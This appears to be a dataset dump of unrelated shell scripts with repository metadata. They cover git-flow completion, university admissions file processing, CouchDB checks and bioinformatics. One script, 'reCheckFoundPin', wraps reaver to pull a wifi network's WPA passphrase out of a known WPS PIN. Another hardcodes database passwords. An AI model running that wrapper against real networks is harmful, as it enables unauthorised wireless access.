':branch:__git_branch_names'
;;
(checkout)
_arguments \
--showcommands'[Show git commands while executing them]' \
':branch:__git_flow_feature_list'\
;;
(pull)
_arguments \
--showcommands'[Show git commands while executing them]' \
':remote:__git_remotes'\
':branch:__git_branch_names'
;;
*)
_arguments \
-v'[Verbose (more) output]'
;;
esac
;;
esac
}
__git_flow_version_list ()
{
local expl
declare -a versions
versions=(${${(f)"$(_call_program versions git flow release list 2> /dev/null | tr -d ' |*')"}})
__git_command_successful || return
_wanted versions expl 'version' compadd $versions
}
__git_flow_feature_list ()
{
local expl
declare -a features
features=(${${(f)"$(_call_program features git flow feature list 2> /dev/null | tr -d ' |*')"}})
__git_command_successful || return
_wanted features expl 'feature' compadd $features
}
__git_flow_remote_feature_list ()
{
local expl
declare -a features
features=(${${(f)"$(_call_program rfeatures git branch -r | grep -E "feature/[-A-Za-z0-9]+" | __git_flow_exsed 's# *origin/feature/([-A-Za-z0-9]+).*#\1#g' 2> /dev/null)"}})
__git_command_successful || return
_wanted features expl 'feature' compadd $features
}
__git_remotes () {
local expl gitdir remotes
gitdir=$(_call_program gitdir git rev-parse --git-dir 2>/dev/null)
__git_command_successful || return
remotes=(${${(f)"$(_call_program remotes git config --get-regexp '"^remote\..*\.url$"')"}//#(#b)remote.(*).url */$match[1]})
__git_command_successful || return
# TODO: Should combine the two instead of either or.
if (( $#remotes > 0 )); then
_wanted remotes expl remote compadd $* - $remotes
else
_wanted remotes expl remote _files $* - -W "($gitdir/remotes)" -g "$gitdir/remotes/*"
fi
}
__git_flow_hotfix_list ()
{
local expl
declare -a hotfixes
hotfixes=(${${(f)"$(_call_program hotfixes git flow hotfix list 2> /dev/null | tr -d ' |*')"}})
__git_command_successful || return
_wanted hotfixes expl 'hotfix' compadd $hotfixes
}
__git_flow_remote_hotfix_list ()
{
local expl
declare -a hotfixes
hotfixes=(${${(f)"$(_call_program rhotfixes git branch -r | grep -E "hotfix/[-A-Za-z0-9\.]+" | __git_flow_exsed 's# *origin/hotfix/([-A-Za-z0-9\.]+).*#\1#g' 2> /dev/null)"}})
__git_command_successful || return
_wanted hotfixes expl 'hotfix' compadd $hotfixes
}
__git_branch_names () {
local expl
declare -a branch_names
branch_names=(${${(f)"$(_call_program branchrefs git for-each-ref --format='"%(refname)"' refs/heads 2>/dev/null)"}#refs/heads/})
__git_command_successful || return
_wanted branch-names expl branch-name compadd $* - $branch_names
}
__git_command_successful () {
if (( ${#pipestatus:#0} > 0 )); then
_message 'not a git repository'
return 1
fi
return 0
}
zstyle -s ':completion:*:*:git:*' user-commands user_commands "#"
user_commands+="#flow:provide high-level repository operations"
zstyle ':completion:*:*:git:*' user-commands ${(@s/#/)user_commands}
| true
|
30bdd9eaa593b4f0e60c7b01ea9e78937afda545
|
Shell
|
alcarl/auto-reaver
|
/reCheckFoundPin
|
UTF-8
| 1,978
| 4.15625
| 4
|
[] |
no_license
|
#!/bin/bash
# following script was created to deal with situation when only PIN is printed, but not WPA PSK
# so script searches WPA PSK until reaver spits it out, using while loop
# perl checks wheter PSK is printed, if so, exit is called.
if [ -z "$1" ] || [ -z "$2" ]; then
echo "There's common situation that reaver finds pin, but without passphrase";
echo "Following script has been written to find passphrase - in case you know the pin";
echo "So for this purpose I wrote following script - you can use it if you have the same problem";
echo "Usage ( [obligatory parameter], [[optional parameter]] ):";
echo "$0 [PIN] [BSSID] [[CHANNEL]]";
echo "Example usage:"
echo "$0 12345679 AA:BB:CC:DD:EE:FF";
exit;
fi
clearBssid(){
echo $1 | sed s/://g;
}
getMonitorName(){
ifconfig | perl -lane '{ if(/^[^\s]*mon/){ $_ =~ s/\s+.*//; print $_; } }'
}
TMP_FILE="/tmp/reCheckFoundPinTMP";
TMP_ACTIVITY_FILE="/tmp/reCheckFoundPinACTIVITY";
CUR_DIR=$(pwd);
PIN=$1;
BSSID=$2;
BSSID_CLEAR=$(clearBssid $BSSID);
CHANNEL_CMD="";
WRITE_FOUND_PASS_TO=$CUR_DIR'/'$BSSID_CLEAR'_FOUND_PASSWORD.txt';
MONITOR_NAME=$(getMonitorName);
if [[ -z "$(ifconfig | grep $MONITOR_NAME)" ]]; then
airmon-ng start wlan0;
fi
if [[ -n "$3" ]]; then
CHANNEL_CMD="--channel=$3 ";
fi
if [[ -f $TMP_FILE ]]; then
rm $TMP_FILE;
fi
touch $TMP_ACTIVITY_FILE;
while true; do
if [[ -f $TMP_FILE ]]; then
rm $TMP_FILE;
exit;
fi
sleep 2;
COMMAND="reaver -p $PIN -i $MONITOR_NAME -b $BSSID -vv -t 20 -g 1 -S -N $CHANNEL_CMD";
echo $COMMAND;
eval $COMMAND | perl -lane '
if (/Received M3/){
print $_;
system("touch '$TMP_ACTIVITY_FILE'");
}
elsif (/WPA PSK/){
print $_;
open (F, ">>'$WRITE_FOUND_PASS_TO'");
print F $_;
close (F);
system("touch '$TMP_FILE'");
}
else {
print $_;
system("if [[ \"$('$CUR_DIR'/checkFileTouchTimeout.sh '$TMP_ACTIVITY_FILE' 60)\" == \"1\" ]]; then killall reaver; fi;");
}
';
done
| true
|
95939098f1de8f9a0fcca3b2ee4e1f53278a8c5e
|
Shell
|
MarriShruthi/first
|
/empWageSal.sh
|
UTF-8
| 240
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash -x
isPresent=1;
randomCheck=$(( RANDOM%2 ))
if [ $isPresent -eq $randomCheck ]
then
echo "Employee is present";
empRatePerHr=20;
e mpHrs=8;
salary=$(($empHrs*$empRaePerHr))
else
echo "Employee is absent";
salary=0;
fi
| true
|
8c13954ffdfe9d70d09ea8142dc3d49265b22e01
|
Shell
|
bandgeekndb/imageNow
|
/Bash/commonAppImport.sh
|
UTF-8
| 11,476
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
set -o errexit
### --- Configuration --- ###
# Set this to 1 if you need to load some files and don't want emails to go to everybody.
sneakLoading="0"
# Set this to 1 if we're at the low point in the cycle and may expect fewer than the full amount of zips.
cycleMessage="1"
if [ $sneakLoading == 1 ]; then
# Enter the email addresss to send notifications to here:
sneakEmail="gjenczyk@umassp.edu"
alertEmail=$sneakEmail
errorReportEmail=$sneakEmail
bostonAlert=$sneakEmail
dartmouthAlert=$sneakEmail
lowellAlert=$sneakEmail
bostonErrors=$sneakEmail
dartmouthErrors=$sneakEmail
lowellErrors=$sneakEmail
runType="_MANUAL"
else
alertEmail="UITS.DI.CORE@umassp.edu"
errorReportEmail="UITS.DI.CORE@umassp.edu caohelp@commonapp.net"
bostonAlert="UITS.DI.CORE@umassp.edu john.drew@umb.edu lisa.williams@umb.edu krystal.burgos@umb.edu"
dartmouthAlert="UITS.DI.CORE@umassp.edu athompson@umassd.edu kmagnusson@umassd.edu j1mello@umassd.edu kvasconcelos@umassd.edu mortiz@umassd.edu"
lowellAlert="UITS.DI.CORE@umassp.edu christine_bryan@uml.edu kathleen_shannon@uml.edu"
bostonErrors="UITS.DI.CORE@umassp.edu caohelp@commonapp.net john.drew@umb.edu lisa.williams@umb.edu krystal.burgos@umb.edu"
dartmouthErrors="UITS.DI.CORE@umassp.edu caohelp@commonapp.net athompson@umassd.edu kmagnusson@umassd.edu j1mello@umassd.edu kvasconcelos@umassd.edu mortiz@umassd.edu"
lowellErrors="UITS.DI.CORE@umassp.edu caohelp@commonapp.net christine_bryan@uml.edu kathleen_shannon@uml.edu"
runtype=""
fi
errorBody="Common App Support: Please regenerate and resend the the attached records via SDS.
Contact the UMass Document Imaging team (UITS.DI.CORE@umassp.edu) with any questions.
-
DO NOT REPLY TO THIS EMAIL."
### --- Libraries and functions --- ###
# Logging library for ImageNow
source "/export/$(hostname -s)/inserver6/script/lib/DILogger-Library.sh"
# Locking library (NFS safe)
source "/export/$(hostname -s)/inserver6/script/lib/MutexLock-Library.sh"
# BEGIN RUNNING LOG
errorCode="0"
runLogDelim="*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*"
runLog="/export/$(hostname -s)/inserver6/log/${runType}commonAppImport_run_log.log"
runLock="/export/$(hostname -s)/inserver6/script/lock/commonAppImport.lock"
echo ${runLogDelim} >> ${runLog}
echo "$(date) - BEGINING commonAppImport.sh" >> ${runLog}
# usage: DIImportLogging.log "sub-process name" "campus abreviation" "header string" "info to log"
# globals: DIImportLogging_workingPath,
function DIImportLogging.log {
# build log filename + path
local logFileName="$(date +%Y-%m-%d)|${2}|Common_App|${1}${runType}.csv"
local fullLogPath="${DIImportLogging_workingPath}${logFileName}"
# check if log file already exists
# if the file hasn't been created yet, create it and write out the header
if [[ ! -e ${fullLogPath} ]]; then
echo "${3}" > "${fullLogPath}"
fi
# append log line to log
echo "${4}" >> "${fullLogPath}"
}
function translateCampusName {
case "$1" in
UMBOS) echo "UMBUA"
;;
UMDAR) echo "UMDUA"
;;
UMLOW) echo "UMLUA"
;;
esac
}
function shortCampusName {
case "$1" in
UMBOS) echo "B"
;;
UMDAR) echo "D"
;;
UMLOW) echo "L"
;;
esac
}
function longCampusName {
case "$1" in
UMBOS) echo "UMass Boston"
;;
UMDAR) echo "UMass Dartmouth"
;;
UMLOW) echo "UMass Lowell"
;;
esac
}
function campusEmail {
case "$1" in
UMBOS) echo ${bostonAlert}
;;
UMDAR) echo ${dartmouthAlert}
;;
UMLOW) echo ${lowellAlert}
;;
esac
}
function campusErrorEmail {
case "$1" in
UMBOS) echo ${bostonErrors}
;;
UMDAR) echo ${dartmouthErrors}
;;
UMLOW) echo ${lowellErrors}
;;
esac
}
# find all the zip files in the directory and itterate through each one
function commonAppUnzip {
echo "$(date) - Unzipping files for ${1}..." >> ${runLog}
local currentCampus="${1}"
local logHeader="Date/Time,File Name"
local unzipDate="$(date +%Y-%m-%d)"
local zipsToProcess=`ls -1 ${inputDirectory}${currentCampus}_*.zip 2>/dev/null | wc -l`
local campusAlert=$(campusEmail $currentCampus)
local emailFile="${inputDirectory}ca_logs/${unzipDate}|$(translateCampusName $currentCampus)|Common_App|1_unzip${runType}.csv"
local unzipPath="1_unzipFiles/${currentCampus}"
local fileCount
# odd syntax is to protect against whitespace and other characters in the filenames
find . -maxdepth 1 -type f -name "${currentCampus}_*.zip" -print0 | while IFS= read -rd $'\0' f ; do >> $runLog 2>&1
# log out current file
local fileDate="$(date +%Y-%m-%d\ %I:%M:%S\ %p -r "$f")"
DIImportLogging.log "1_unzip" "$(translateCampusName $currentCampus)" "${logHeader}" "${fileDate},${f}"
# perform the unzip
if ! unzip -t -q -d "${unzipPath}" "${f}"; then
echo "could not unzip file [${f}]. It has been moved to the error directory" |
mailx -s "[DI ${hostAbrev} Error] Common App Import Error" ${alertEmail}
mv "${f}" "error"
errorCode="1"
else
unzip -q -d "${unzipPath}" "${f}" >> $runLog 2>&1
mv "${f}" "archive" >> $runLog 2>&1
fi
done
echo "$(date) - Finished unzipping files for ${1}" >> ${runLog}
fileCount=`ls ${unzipPath} | grep pdf$ | wc -l`
#Sends an email, may alert if there is a problem with the number of zips rec'd depending on the cycleMessage flag
if [ $cycleMessage -eq 1 ]; then
if [ $zipsToProcess -eq 0 ]; then
(echo -e "No files were received for $(longCampusName $currentCampus) on ${unzipDate}") | mailx -s "[DI $hostAbrev Notice] ${1} No Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
else
(echo -e "Attached is a list of zip files received from Common App for $(longCampusName $currentCampus) on ${unzipDate} \nThe zips contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Notice] ${zipsToProcess} ${1} Common App File(s) Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
fi
else
if [ $zipsToProcess -eq 0 ]; then
(echo -e "No files were received for $(longCampusName $currentCampus) on ${unzipDate}.\nYou may want to verify this on the Common App Control Center") | mailx -s "[DI $hostAbrev Warning] ${1} No Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
elif [ $currentCampus != "UMDAR" -a $zipsToProcess -eq 1 ]; then
(echo -e "Two zips were expected for $(longCampusName $currentCampus) on ${unzipDate}.\nWe have only received ${zipsToProcess}.\nYou may want to verify this is correct on the Common App Control Center. \nThe zip(s) contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Warning] ${1} Unexpected Number of Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
elif [ $currentCampus == "UMDAR" -a $zipsToProcess -lt 3 ]; then
(echo -e "Three zips were expected for $(longCampusName $currentCampus) on ${unzipDate}.\nWe have only received ${zipsToProcess}.\nYou may want to verify this is correct on the Common App Control Center. \nThe zip(s) contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Warning] ${1} Unexpected Number of Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
else
(echo -e "Attached is a list of zip files received from Common App for $(longCampusName $currentCampus) on ${unzipDate} \nThe zips contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Notice] ${1} Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
fi
fi
}
function checkForErrorPDFs {
echo "$(date) - Checking for errors for ${1}" >> ${runLog}
local currentCampus="${1}"
local logDate="$(date +%Y-%m-%d)"
local dirToCheck="${inputDirectory}1_unzipFiles/${currentCampus}"
local todaysLog="ca_logs/${1}_errorPDF_${logDate}${runType}.csv"
local filesToCheck=`ls -1 ${dirToCheck}/*.pdf 2>/dev/null | wc -l`
local numberOfErrors=0
local logHeader="CAMPUS,CAID,CODE,STUDENT NAME,CEEB,RECOMMENDER ID"
local targetEmail=$(campusErrorEmail $currentCampus)
local emailFile="${DIImportLogging_workingPath}${logDate}|$(translateCampusName $currentCampus)|Common_App|3_errors${runType}.csv"
if [ ${filesToCheck} != 0 ]; then
grep -r -i "Error retreiving document for" $dirToCheck | awk ' {for (i=3; i<NF; i++) printf $i " "; $NF=""; print $NF}' | sed 's/[ \t]*$//' >> `echo $todaysLog`
find $dirToCheck -size 753c >> `echo $todaysLog`
while IFS= read line; do
mv "${line}" "${inputDirectory}error/${1}" >> $runLog 2>&1
numberOfErrors=$((numberOfErrors+1))
done < "${inputDirectory}$todaysLog"
if [ ${numberOfErrors} != 0 ]; then
set +H
emailFormatRegex="^.*\(([0-9]+)\)*([a-zA-Z]{2,3})_*([0-9]*)_([0-9]+)_+([\'[:space:]A-Za-z-]+_[\'[:space:]A-Za-z-]+)_.*([a-zA-Z]{2,3}+)_*([0-9]*).pdf$"
while IFS= read f; do
local userFriendly="$(echo ${f} | sed -re "s#${emailFormatRegex}#${1},\4,\2,\5,\3,\7 #g")"
local caseFixer="$(echo $userFriendly | tr '[:lower:]' '[:upper:]')"
DIImportLogging.log "3_errors" "$(translateCampusName $currentCampus)" "${logHeader}" "${caseFixer}"
done < "${inputDirectory}$todaysLog"
rm "${inputDirectory}$todaysLog" >> $runLog 2>&1
(echo -e "${errorBody}"; uuencode "${emailFile}" "${logDate}_$(longCampusName $currentCampus)_Common_App_errors.csv") | mailx -s "[DI $hostAbrev Notice] ${1} Common App Reprints for ${logDate}" ${targetEmail} >> $runLog 2>&1
fi
fi
echo "$(date) - Error check complete for ${1}" >> ${runLog}
}
function commonAppProcessFiles {
echo "$(date) - Processing pdfs for ${1}" >> ${runLog}
local currentCampus="${1}"
local currDate="$(date +%y%m%d)"
local drawerName=$(shortCampusName $1)
local dateTime="$(date +%Y-%m-%d\ %I:%M:%S\ %p)"
# setup logging
local logHeader="Date/Time,Original File Name,Renamed File Name"
# turn off history substitution to allow for correct regex parsing
set +H
incomingFilesRegex="^.*\)([a-zA-Z]{2,3})_([0-9]+)_.*_([A-Z]+).pdf$"
uberRegex="^.*\(([0-9]+)\)*([a-zA-Z]{2,3})_*([0-9]*)_([0-9]+)_.*_([A-Z]+)_*([0-9]*).pdf$"
find "1_unzipFiles/${1}" -regextype posix-extended -regex "${uberRegex}" -print0 | while IFS= read -rd $'\0' f ; do >> $runLog 2>&1
# do some stuff to the files here
local newName="$(echo ${f} | sed -re "s#${uberRegex}#CA_${currDate}_${drawerName}_\4_\2_\5_\3_\1.pdf#g")"
local standardizedName="$(echo $newName | tr '[:lower:]' '[:upper:]')"
DIImportLogging.log "2_rename" "$(translateCampusName $currentCampus)" "${logHeader}" "${dateTime},${f},${newName}"
mv "${f}" "${outputDirectory}${standardizedName}"
done
echo "$(date) - Finished processing pdfs for ${1}" >> ${runLog}
}
### --- main script --- ###
# attempt to get a lock on the process
if (mkdir $runLock) >> ${runLog} 2>&1; then
# get environment abreviation (DEV|TST\PRD)
hostAbrev="$(hostname)"
hostAbrev="${hostAbrev:2:3}"
hostAbrev="$(echo ${hostAbrev} | tr '[:lower:]' '[:upper:]')"
# build working path
inputDirectory="/di_interfaces/DI_${hostAbrev}_COMMONAPP_AD_INBOUND/"
cd "${inputDirectory}" >> $runLog 2>&1
outputDirectory="/di_interfaces/import_agent/DI_${hostAbrev}_SA_AD_INBOUND/"
# build log paths
DIImportLogging_workingPath="ca_logs/"
# unzip the files
commonAppUnzip "UMBOS"
commonAppUnzip "UMDAR"
commonAppUnzip "UMLOW"
# check for the Contact Support messagge
checkForErrorPDFs "UMBOS"
checkForErrorPDFs "UMDAR"
checkForErrorPDFs "UMLOW"
# process the files
commonAppProcessFiles "UMBOS"
commonAppProcessFiles "UMDAR"
commonAppProcessFiles "UMLOW"
rm -rf "$runLock" >> ${runLog} 2>&1
else
echo "`date` - Script already running" >> ${runLog}
fi
echo ${runLogDelim} >> ${runLog}
exit ${errorCode} >> $runLog 2>&1
| true
|
9576556a2f3d4f30ea2285cbb3ef9744113eb167
|
Shell
|
masukomi/masuconfigs
|
/bin/branch_finder
|
UTF-8
| 1,375
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/sh
# branch_finder "grep string" search_type
# search types
if [[ "$#" -lt 2 ]]; then
echo "Usage: branch_finder <grep_string> <search_type>"
echo "search types: last_commit, codebase"
exit 0
fi
echo "WARNING: This will blow away all uncommitted changes. ok? [y/n]"
read OK
if [[ "$OK" == "y" ]]; then
LOOKING_FOR=$1
SEARCH_TYPE=$2
echo "LOOKING FOR: $LOOKING_FOR"
if [[ "$SEARCH_TYPE" == "last_commit" ]]; then
echo "in files touched in the last commit"
elif [[ "$SEARCH_TYPE" == "codebase" ]]; then
echo "in the entire codebase"
else
echo "unsupported search type: $SEARCH_TYPE"
exit 1
fi
BRANCHES=$(git for-each-ref --shell --format="%(refname)" \
| grep 'refs/heads' --color=never \
| sed "s/'//g" | sed "s/refs\/heads\///" )
for branch in $BRANCHES; do
echo "checking in $branch"
git clean --quiet -f
git reset --quiet --hard HEAD
git checkout --quiet $branch
#echo $(git log --stat -n 1 | grep user.rb)
if [[ "$SEARCH_TYPE" == "last_commit" ]]; then
git log --stat -n 1 | grep $LOOKING_FOR
elif [[ "$SEARCH_TYPE" == "codebase" ]]; then
grep -r $LOOKING_FOR *
fi
if [[ $? -eq 0 ]] ; then
echo '========================================'
echo "$branch matched"
git log --stat -n1
echo '========================================'
fi
done
else
echo "Ok. No worries. Come again when you're ready"
fi
| true
|
fddd854418dde3a40c9be981b3363f5ad1d31018
|
Shell
|
bluelamar/WsRuler
|
/scripts/check_cdb.sh
|
UTF-8
| 3,502
| 2.65625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
echo "Get the root /:"
curl http://localhost:5984/
echo "Get the utils index.html:"
curl http://localhost:5984/_utils/index.html
echo "Get the utils verify install:"
curl http://localhost:5984/_utils/index.html#verifyinstall
AUTHHDR="Authorization:"
#AUTHUSER="wsruler"
AUTHPWD="oneringtorule"
AUTHUSER="admin"
AUTHPWD="mysecretpassword"
#AUTHVAL="Basic " +btoa(username + ":" + password"
AUTHVAL=`echo "${AUTHUSER}:${AUTHPWD}" | base64`
AUTHSTR="Basic ${AUTHVAL}"
# WORKS
#curl -v -H "Accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" http://localhost:5984/_session -X POST -d "name=wsruler&password=oneringtorule"
echo "Get a session with json:"
curl -v -H "Accept: application/json" -H "Content-Type: application/json" http://localhost:5984/_session -X POST -d '{"name":"wsruler","password":"oneringtorule"}'
#POST /_session HTTP/1.1
#Accept: application/json
#Content-Length: 24
#Content-Type: application/x-www-form-urlencoded
#Host: localhost:5984
#
#name=root&password=relax
#COOKIE="AuthSession=d3NydWxlcjo1QkNFQTZCMjo3Hyf5CvRgjcMLazq6rQMrkksYnw; Version=1; Path=/; HttpOnly"
curl -c cdbcookies -H "Accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" http://localhost:5984/_session -X POST -d "name=wsruler&password=oneringtorule"
echo "Get all the dbs:"
# ex: []
# curl --cookie "$COOKIE" http://localhost:5984/_all_dbs
curl --cookie "cdbcookies" http://localhost:5984/_all_dbs
echo "Get the list of nodes:"
# Returns a list of nodes
# ex: {"all_nodes":["nonode@nohost"],"cluster_nodes":["nonode@nohost"]}
#curl --cookie "$COOKIE" http://localhost:5984/_membership
curl --cookie "cdbcookies" http://localhost:5984/_membership
#echo "Put a new node:"
#curl --cookie "cdbcookies" -X PUT "http://localhost:5984/_nodes/node2@111.222.333.444" -d {}
#echo "Get the list of nodes again:"
#curl --cookie "cdbcookies" http://localhost:5984/_membership
echo "Get the config for node nonode:"
#curl http://localhost:5984/_node/{node-name}/_config
curl --cookie "cdbcookies" "http://localhost:5984/_node/nonode@nohost/_config"
curl http://localhost:5984/_uuids
# Health check endpoint
curl http://localhost:5984/_up
echo "Creates a new database:"
curl -v --cookie "cdbcookies" http://localhost:5984/bluff -X PUT
echo "Returns the database information:"
curl http://localhost:5984/fluff
#echo "Checks the database existence:"
#curl http://localhost:5984/stuff -X HEAD
echo "Creates a new document with generated ID if _id is not specified:"
curl -H "Content-Type: application/json" http://localhost:5984/stuff -X POST -d '{"name":"bud","age":99}'
echo "Returns a built-in view of all documents in this database:"
curl http://localhost:5984/tuff/_all_docs
exit 0
echo "Get the db id=592ccd646f8202691a77f1b1c5004496 :"
curl http://localhost:5984/stuff/592ccd646f8202691a77f1b1c5004496
echo "Update a document with _id=592ccd646f8202691a77f1b1c5004496:"
curl --cookie "cdbcookies" -H "Content-Type: application/json" http://localhost:5984/stuff/592ccd646f8202691a77f1b1c5004496 -X PUT -d '{"name":"sam","age":42,"_rev":"1-3f12b5828db45fda239607bf7785619a"}'
echo "Get again the db id=592ccd646f8202691a77f1b1c5004496 :"
curl http://localhost:5984/stuff/592ccd646f8202691a77f1b1c5004496
# Creates a new database
curl http://localhost:5984/{db} -X PUT
# Deletes an existing database
curl http://localhost:5984/{db} -X DELETE
curl http://localhost:5984/{db}/_all_docs
curl http://localhost:5984/{db}/_all_docs -X POST
| true
|
869cd6928f4bf91ffa93f0992766690ee3c26d40
|
Shell
|
nawa/back-friend
|
/functional-tests/run_tests.sh
|
UTF-8
| 987
| 3.25
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
TESTS_RESULT=0
echo "======================= Prepare environment ======================="
docker-compose --file functional-tests/docker-compose.yml down
docker-compose --file functional-tests/docker-compose.yml up -d postgres
#wait for postgres start. Can be improved
sleep 5;
docker-compose --file functional-tests/docker-compose.yml up -d rest
echo -e "\n======================= Run tests ======================="
docker-compose --file functional-tests/docker-compose.yml up --abort-on-container-exit functional-tests
TESTS_RESULT=$?
echo -e "\n======================= Destroy environment ======================="
docker-compose --file functional-tests/docker-compose.yml down
if [ "$TESTS_RESULT" -eq "0" ];
then
tput setaf 4; echo -e "\n!!!!!!!!!!!!!!!!!!!!!!! Tests successfully completed !!!!!!!!!!!!!!!!!!!!!!!"; tput sgr0;
else
tput setaf 1; echo -e "\n!!!!!!!!!!!!!!!!!!!!!!! Tests failed !!!!!!!!!!!!!!!!!!!!!!!"; tput sgr0;
fi
exit ${TESTS_RESULT}
| true
|
6843cc1d7bb2ebd9bbb11a30cc56938869e8309b
|
Shell
|
KoShimizuV/learnings
|
/bash/for2.sh
|
UTF-8
| 127
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/sh
echo "1 b c" > tmp.txt
echo "2 b c" >> tmp.txt
IFS=$'\n'
for line in `cat tmp.txt`
do
echo "line=${line}"
done
| true
|
4490901e03daa3de0a4d52a9a28c582bf46e0643
|
Shell
|
yunju/DMAnaRun2_AddModules
|
/prod/printEOSFile.sh
|
UTF-8
| 577
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
scriptname=`basename $0`
EXPECTED_ARGS=3
userid="syu"
if [ $# -eq $(( EXPECTED_ARGS - 1 )) ]
then
echo "user ID is set to "$userid
else if [ $# -ne $EXPECTED_ARGS ]
then
echo "Usage: ./$scriptname directory outputFileName userid"
echo "Example: ./$scriptname AbelianZPrime_ZH_lljj_M800-MADGRAPH filelist syu"
exit 1
else
userid=$3
fi
fi
echo $1
echo "user ID is "$userid
cmsLs /store/user/$userid/$1 | grep -a $userid | awk '{print "cmsLs "$5}' | bash | grep -a $userid | awk '{print "cmsLs "$5}' | bash | grep -a root | awk '{print $5}' > $2
| true
|
36f4ed1e1ad3b6569810e50013fdc0ab039c4048
|
Shell
|
biodranik/landing-hugo
|
/tools/watch.sh
|
UTF-8
| 554
| 3.5
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Useful debug options:
# -e aborts if any command has failed.
# -u aborts on using unset variable.
# -x prints all executed commands.
# -o pipefail aborts if on any failed pipe operation.
set -euo pipefail
# Project root directory without slash at the end.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
ROOT="$SCRIPT_DIR/.."
# Hugo (extended) automatically rebuilds the site on any scss changes.
hugo server -s "$ROOT" || { echo "Please install hugo binary from here: https://github.com/gohugoio/hugo/releases"; exit 1; }
| true
|
7f1dd174c0c8748527578c8fc6062811836241ed
|
Shell
|
geircode/setting-up-ghost-in-azure
|
/phpmyadmin/docker-compose.up.sh
|
UTF-8
| 481
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
BASEDIR=$(dirname "$0")
echo "$BASEDIR"
cd $BASEDIR
docker rm -f phpmyadmin-1
docker-compose -f docker-compose.yml down --remove-orphans
docker network create -d overlay --attachable setting_up_ghost_in_azure_network
docker-compose -f docker-compose.yml up -d --remove-orphans
# wait for 1-2 seconds for the container to start
echo sleeping 2 secs
sleep 2
# http://localhost:8900/
echo "Opening a terminal to the Container..."
docker exec -it phpmyadmin-1 /bin/bash
| true
|
8ae6e4b1a962fed823149dc02f9a082744a81c09
|
Shell
|
mdehollander/longread-UMI-pipeline
|
/scripts/check_primer_position.sh
|
UTF-8
| 1,994
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
# DESCRIPTION
# Script for checking position of gene specific primers
# in read terminals when used with custom library preparation.
# Custom library preparation includes change or modification to
# any adaptors and/or use of Nanopore barcoding kits.
#
# IMPLEMENTATION
# author Søren Karst (sorenkarst@gmail.com)
# Ryans Ziels (ziels@mail.ubc.ca)
# license GNU General Public License
#
### Source commands and subscripts -------------------------------------
export PIPELINE_PATH="$(dirname "$(readlink -f "$0")")"
. $PIPELINE_PATH/dependencies.sh # Path to dependencies script
### Terminal input ------------------------------------------------------------
READ_IN=${1:-reads.fq}
OUT_DIR=${2:-primer_position}
THREADS=${3:-60}
FW2=${4:-AGRGTTYGATYMTGGCTCAG} #RC: CTGAGCCAKRATCRAACYCT
RV2=${5:-CGACATCGAGGTGCCAAAC} #RC: GTTTGGCACCTCGATGTCG
TERMINAL_LENGTH=${6:-500}
### Determine primer mapping positions
# Create output dir
mkdir $OUT_DIR
# Extract adaptor region
$GAWK -v BD="$OUT_DIR" -v TL="$TERMINAL_LENGTH" '
NR%4==1{
print ">" substr($1,2) > BD"/reads_t1.fa";
print ">" substr($1,2) > BD"/reads_t2.fa";
}
NR%4==2{
print substr($0, 1, TL) > BD"/reads_t1.fa";
print substr($0, length($0) - TL + 1, TL) > BD"/reads_t2.fa";
}
' $READ_IN
# Determine primer start position from either end
primer_start_pos(){
$CUTADAPT \
-j $THREADS \
-O 10 \
-a $FW2 \
-a $RV2 \
- \
--discard-untrimmed \
--quiet |\
awk '
NR%2==0{
# Position
p=length($0)+0
c[p]++
if(pm+0 < p){pm = p}
# SD and MEAN
sum+=p
sums+=p*p
n++
} END {
for(j=0; j <= pm; j++){
print j, c[j]+0
}
print "\nMean\tsd"
print sum/n"\t"sqrt(sums/n -(sum/n)^2)
}
'
}
cat $OUT_DIR/reads_t1.fa |\
primer_start_pos \
> $OUT_DIR/reads_t1_pos.txt
$SEQTK seq -r $OUT_DIR/reads_t2.fa |\
primer_start_pos \
> $OUT_DIR/reads_t2_pos.txt
| true
|
f8882836ac18d0c5c1aad0b649a2d272fc0d73ec
|
Shell
|
Zeebrow/wish
|
/plugins/fmt_md_text/build.sh
|
UTF-8
| 584
| 3.3125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
bin_output_name=${1:-fmt_md_text}
randomname=$(uuidgen)
container=wish/"$bin_output_name"
d=`pwd`
[ ${d##*/} != "fmt_md_text" ] && echo "must run build from ./plugins/fmt_md_text" && exit 1
printf "building...\n"
docker build --build-arg BIN_OUTPUT_NAME="$bin_output_name" -t "$container" . || exit 1
printf "standup...\n"
docker container create --name "$randomname" "$container" || exit 1
printf "copying binary...\n"
docker container cp "$randomname":/output/fmt_md_text ../../src/scripts/helpers || exit 1
printf "rm...\n"
docker container rm "$randomname" || exit 1
| true
|
